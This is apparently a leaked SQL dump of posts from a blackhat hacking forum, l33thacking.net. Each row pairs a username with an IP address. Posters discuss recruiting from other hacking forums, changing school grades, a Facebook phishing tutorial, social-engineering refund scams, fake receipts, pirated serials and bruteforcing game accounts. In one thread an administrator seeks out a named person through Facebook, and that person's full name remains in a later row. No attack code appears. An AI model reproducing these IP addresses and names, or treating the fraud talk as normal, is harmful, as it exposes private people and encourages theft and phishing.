strategy. How are you getting the word out about l33thacking.net? [/quote] Basically advertise on forums like h@ckforums because we have many more blackhat forums that HF doesn\'t have and a lot of hackers want to learn more advanced hacking, get serials, social engineering, want movie rips etc and we allow such discussion but HF doesn\'t so we can easily attract HF members. So basically the plan is that we need to offer HQ members that are interested in more advanced hacking and we also try to keep the skiddiness down. [quote=\'iTzIpod\' pid=\'3599\' dateline=\'1349523643\'] Can we use traffic bots on LH? [/quote] Nice idea but I want real traffic only so that\'s why I haven\'t used any traffic bots yet.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ec6757bd4ad3ee18fb75523dec045f8f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3683', '729', '3678', '7', 'RE: Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1349549889', '[quote=\'iTzIpod\' pid=\'3678\' dateline=\'1349548100\'] I knew about this earlier today. But I didn\'t click on any. Hopefully I don\'t get infected. Not going to be downloading or clicking any links on Skype Just for safety reasons. [/quote] Yea man just be careful, I am just warning everyone.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '89b014c9afa7d79179c510e48de44061', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3684', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '225', 'Graycat', '1349550025', 'sounds like somthing i would do', '75.162.63.63', '1268924223', '0', '0', '0', '0', '1', '999a33931ccb3c18d8064ee55ffb8546', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3685', '727', '3654', '35', 'RE: Rate My Thread Design + Download', '0', '222', 'Exposé', '1349550077', 'It\'s decent but not the best. I think u should make like a bg template and then put all of these items inside it if u know what I mean', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', 'd893a4b10c92b5757f3aa43ace91eda7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3686', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '222', 'Exposé', '1349550283', 'Haha yeh let\'s hope so....', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', 'f77aa3bfb9681ccc955eb33aef406b2a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3687', '706', '3633', '4', 'RE: Supppp', '0', '222', 'Exposé', '1349550411', 'Wouldn\'t that be awesome if those girls were actually lesbians haha... On subject welcome to LH and enjoy your stay', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', '85f09779075ad3d2807e223bb60b7b88', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3688', '310', '1458', '13', 'RE: [ HOT ] How to Hack Your School Grading System [Change]', '0', '225', 'Graycat', '1349551597', 'seems like a fun task to do with a open wifi hotspot for the neighbors stealing wifi.', '75.162.63.63', '1268924223', '0', '0', '0', '0', '1', '7311c5bb2f486598e4e9ac7e9c4673a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3690', '679', '3449', '4', 'RE: flamingworm here!', '0', '9', 'p420', '1349552170', 'I spelt it as \"cum\" because i wanted to give people a laugh.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'bd6211e0b84ff3f16e29ea007d9db3b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3691', '691', '3517', '3', 'RE: Gaming Section Released', '0', '9', 'p420', '1349552212', 'Nice updates. Thanks for adding the new forums. When is Marketplace coming back?', '72.231.24.165', '1223104677', '0', '0', '9', '1349552221', '1', '0d53498c928977cbfe251789a355b4a9', '0', '1349552221'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3692', '680', '3457', '35', 'RE: Some of my works...', '0', '9', 'p420', '1349552258', 'Looks broken to me too. I think it got removed.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f4202014fb2a6d051f5f42e35089333f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3693', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '9', 'p420', '1349552431', 'I don\'t think it would get approved because there\'s no real purpose of the group. EX: Coders will help new coders, Unique helps keep LH a active site etc.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '8b8fbc2b6eaccf8e8087f96e23af57f7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3694', '706', '3633', '4', 'RE: Supppp', '0', '9', 'p420', '1349552497', 'Welcome Kasual, If you have any questions feel free to check out the help documents. http://l33thacking.net/misc.php?action=help', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'd98d35ea13ee1008397026b0aaf74c21', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3695', '725', '3652', '7', 'RE: L33THacking Cloudflare Resolver!', '0', '9', 'p420', '1349552551', 'Nice giveaway but how do we use it i typed my username but didn\'t work.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'd92e1b053c61b958a1505c5aa4a3e752', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3696', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '9', 'p420', '1349552582', 'Never played minecraft but seen some people play it.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '6a580ca40abf998fe7150d18d6b28590', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3697', '700', '3572', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '9', 'p420', '1349552825', 'I vouch for Water and Milo :D', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2188ef03fec34c06c9e5ba211308a7e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3698', '310', '3688', '13', 'RE: [ HOT ] How to Hack Your School Grading System [Change]', '0', '9', 'p420', '1349552859', '[quote=\'Graycat\' pid=\'3688\' dateline=\'1349551597\'] seems like a fun task to do with a open wifi hotspot for the neighbors stealing wifi. [/quote] Hotspot shield is the worst VPN to use to change your grades. Try http://l33thacking.net/thread-647.html OR http://l33thacking.net/thread-123.html', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'c2af52dcd71b0906e2bf6bf2a3486851', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3699', '731', '0', '3', 'PIDs for normal or upgraded?', '0', '9', 'p420', '1349552972', 'I have heard that the upgraded members can access the serials forum and Fake receipt creation section. Now from what I have been told that we are allowed to post PIDs in the public section so why do we have a private section for upgraded members then?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'c82061a1ebf57975d160765f573e46c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3701', '446', '2058', '28', 'RE: This forum is dead..', '0', '82', 'iTzIpod', '1349553268', 'But still traffic is still traffic. If we get a lot of traffic, it still helps advertise LH. Real or Not..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '689304c487111d8a8667f8bf41e270a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3702', '727', '3654', '35', 'RE: Rate My Thread Design + Download', '0', '82', 'iTzIpod', '1349553307', 'Those look better. ^ Nice idea. Would be great.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0780c090e0dfd55f5b7e668dffe9e0cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3703', '704', '3616', '66', 'RE: Minecraft Accounts', '0', '82', 'iTzIpod', '1349553338', 'Does that \"p\" stand for post? You didn\'t PM me.. :/ Lol That post was so HQ. Like Oh Mah God.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89242c31112ee8b22a18436218caf31d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3704', '691', '3517', '3', 'RE: Gaming Section Released', '0', '82', 'iTzIpod', '1349553386', 'Probably when the forum has more active members. And is succeeding', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f67dea88b1ba265be04391e13747333c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3706', '725', '3652', '7', 'RE: L33THacking Cloudflare Resolver!', '0', '82', 'iTzIpod', '1349553461', 'It\'s a CloudFlare Resolver not a Skype ID Resolver. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '42d55c8adc1a3c9595ec7da3830694c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3707', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '82', 'iTzIpod', '1349553492', 'Do you want to play it though? I can hook you up with an account. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '631042f4b5609709f99185890a50768a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3708', '637', '3548', '16', 'RE: I need to SE a gaming keyboard', '0', '62', 'R?????zo?', '1349554068', '[quote=\'flamingworm\' pid=\'3548\' dateline=\'1349495232\'] Do you still need this..I might be able to help you out :D [/quote] yeah I do bro.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1617d3caee1fded6abb6da13a0e91fb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3709', '732', '0', '7', 'Congratz iTzIpod', '0', '5', 'Timmy', '1349555063', 'iTzIpod finally reached 1K post. Congratz man and thanks for contributing. Now calm down a little bit :cool:', '173.245.64.232', '-1376435992', '1', '0', '0', '0', '1', 'c37c9947f51c4a946d4aa290fa2abbeb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3710', '718', '3645', '16', 'RE: Apple Cookie Case', '0', '5', 'Timmy', '1349555303', 'What kind of excuse should we use any hints?', '173.245.64.232', '-1376435992', '1', '0', '0', '0', '1', '4c4e600576f4819a90a0c859e0aa308e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3711', '691', '3517', '3', 'RE: Gaming Section Released', '0', '5', 'Timmy', '1349555395', 'i Think Jok3r will add when LH gets more active members.', '173.245.64.232', '-1376435992', '1', '0', '0', '0', '1', 'c192f2e0ed77c728212336d5480ed780', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3712', '733', '0', '19', '[Junk]Who is [removed] out here?', '0', '1', 't3h jok3r', '1349556171', 'If your name is [removed] please PM me ASAP otherwise I will have to go through your FB profile. I will junk this thread after I find out who Logan is. Also who lives in Ontario Canada?', '72.231.24.165', '1223104677', '1', '0', '1', '1349570005', '1', '035c59fb8db7cbfe191661cbee5ca108', '0', '1349570005'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3713', '117', '3552', '46', 'RE: Facebook Phishin* Website [tut]with pictures', '0', '53', 'sirchamp', '1349557934', '[quote=\'flamingworm\' pid=\'3552\' dateline=\'1349495686\'] Lol iv\'e seen a much simpler version of this tut on HF....:facepalm:. Your version seems a little too complex... [/quote] Hmm How should there be anything simpler than that? Make a website upload the php files and finito. This is the only way I know^^', '188.155.56.90', '-1130678182', '1', '0', '53', '1349765266', '1', '313e15a85cc9904877f98e88e28d1013', '0', '1349765266'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3714', '732', '3709', '7', 'RE: Congratz iTzIpod', '0', '100', '??zg???g????61', '1349558549', 'Holy shit already?! Nice ipod ahahhahaha', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '33a3836a4c92d02cc8c946d0cc018542', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3715', '732', '3709', '7', 'RE: Congratz iTzIpod', '0', '3', '??????????¢™', '1349558554', 'Congratz iTxIpod, keep it up.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c2c3408d6b17e65bd36e2de7bfd55e4a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3736', '730', '3677', '72', 'RE: Need for Speed Most Wanted limited edition', '0', '61', 'NXK', '1349586704', 'I am for sure, I loved the original.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '925fd63cf2db5727be69e1f40462042e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3717', '733', '3712', '19', 'RE: Who is Logan Turner out here?', '0', '222', 'Exposé', '1349558613', 'Is there a reason your going through someone\'s facebook profile? (btw im not Logan Turner lol)', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'df35749c22e80ed891ebb3f9d041d90f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3718', '732', '3709', '7', 'RE: Congratz iTzIpod', '0', '222', 'Exposé', '1349558652', 'Da fuq....lol he does post alot tho so yeh. Anyway\'s congrats :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9b8c48360eb85e4d0b915f36f2e0577e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3719', '733', '3712', '19', '[Junk]Who is Logan Turner out here?', '0', '61', 'NXK', '1349559741', 'This thread has been junked.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3720', '660', '3300', '30', 'RE: Vulcan Private Logger', '0', '100', '??zg???g????61', '1349561397', 'Ohhh nice! thanks for the share buddy :)', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '2a3b7562f92916a0eaf68996f71a5c92', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3721', '732', '3709', '7', 'RE: Congratz iTzIpod', '0', '82', 'iTzIpod', '1349561858', 'Woah. I got 1,000+ posts? :o Never noticed that.. Thanks everyone.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd2ff8d7656266ab19c497d1a723c619f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3722', '732', '3709', '7', 'RE: Congratz iTzIpod', '0', '205', 'mothered', '1349562002', 'An amazing 21 posts per day on average, with around 27% of total posts. Well done mate, congratz :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '01daf2680b8b36ae940b879ea0882abf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3723', '725', '3652', '7', 'RE: L33THacking Cloudflare Resolver!', '0', '205', 'mothered', '1349562144', 'Seems like a handy little tool Indeed. Cheers.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd45d29b4c407ec8ab3b63377109b6731', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3724', '691', '3517', '3', 'RE: Gaming Section Released', '0', '205', 'mothered', '1349562423', 'The Gaming sector, Is quite popular on forums, so I assume this should take off rather well. Nice move :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '969c993096b447db1a70f905a38ede35', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3725', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '205', 'mothered', '1349562596', 'I used to play It now and again a few years ago, when I was bruteforcing premium accounts. I really enjoyed It, but don\'t have the time for It at the moment.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a3d583ffa653fd2b851e759441fa09f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3726', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '205', 'mothered', '1349562730', 'I\'d also like to know what this Is about. Google seems to provide mixed results.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9a1dcfdedd5debed717ba3ab69dbd41f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3727', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '222', 'Exposé', '1349562875', 'I don\'t think the name should determine the group. We are an elite group on LH that posts HQ and are active :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '46058d10dd05f1ff227d291b7ea5e3fc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3728', '727', '3654', '35', 'RE: Rate My Thread Design + Download', '0', '205', 'mothered', '1349563047', 'The \"Buy Now\" part of It looks great. The rest may need a little work. Just my opinion :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '0cc5c681085f66877fb665e65ca0abeb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3729', '732', '3709', '7', 'RE: Congratz iTzIpod', '0', '82', 'iTzIpod', '1349567466', 'Thanks mothered. :D Time for 2k posts :3 Nah I joke.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b831b0476b96f7a55286ccadb3196a2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3730', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1349567725', 'Well. Unique is kinda basically that itself.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9e806ffe65053467a923a8299266929e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3731', '731', '3699', '3', 'RE: PIDs for normal or upgraded?', '0', '1', 't3h jok3r', '1349570198', 'PID generators etc can be distributed in the public forums and in the PIDs forum only PIDs (AKA Serials) are posted. In the PIDs section there is not only PIDs for SEing but PIDs for programs and more.', '24.193.21.206', '415307214', '1', '0', '0', '0', '1', '2a35a59a595daeae7e158dd2197bc071', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3732', '212', '3727', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1349573334', '[quote=\'flamingworm\' pid=\'3727\' dateline=\'1349562875\'] I don\'t think the name should determine the group. We are an elite group on LH that posts HQ and are active :D [/quote] Actually no, Elite group is a upgrade group that has to be purchased.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '02102b23aaf17017a93f3065e528250d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3737', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '61', 'NXK', '1349586749', 'It\'s probably for minecraft. But jesus OP atleast put some time into your threads..', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '601344afa9b2a1e42fb1a560f7416250', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3738', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '1', 't3h jok3r', '1349586811', 'Another thing, if you were unable to access LH and you received a message from Cloudflare saying you were banned then please PM me.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1b5b1c0d59e6f9cbf17a5df1af06f32f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3739', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '205', 'mothered', '1349607094', 'Upon first logging In, I did notice the number of members went down. So what exactly happened to give cause for Google to ban?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '52498ecef5f22d176078888d13f11c96', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, 